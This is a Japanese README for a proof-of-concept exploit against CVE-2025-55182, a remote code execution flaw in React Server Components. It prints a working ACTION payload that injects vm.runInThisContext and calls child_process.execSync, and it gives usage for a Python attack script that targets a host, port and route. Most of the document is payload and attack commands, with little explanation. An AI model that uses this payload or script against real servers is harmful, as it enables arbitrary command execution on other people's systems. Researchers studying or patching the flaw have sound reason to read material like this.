
CVE-2025-55182 の概念実証エクスプロイト。悪意のある ACTION ペイロードと vm.runInThisContext インジェクションを介した React Server Components でのリモートコード実行を実証します。
本プロジェクトは CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept であり、特定の条件下で vm.runInThisContext と 悪意のある ACTION payload を介してリモートコード実行をトリガーできることを示しています。
React Server Components の ACTION payload は、特定の条件下で以下を行います:
攻撃者は以下の payload を構築できます:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| パラメータ | 必須 | デフォルト値 | 説明 |
|---|---|---|---|
--host | はい | なし | ターゲットサーバーの IP またはドメイン。例:127.0.0.1、192.168.1.10、example.com |
--port | いいえ | 80 | ターゲット HTTP サービスのポート。例:3003 |
--path | はい | なし | 脆弱性をトリガーできるルートパス。例:/feedback、/action |
--https | いいえ | False | HTTPS を使用して payload を送信するか(デフォルトは HTTP) |
python a.py --host <ターゲットIP> --port <ポート> --path <ターゲットURLパス>
python a.py --host 127.0.0.1 --port 3003 --path /feedback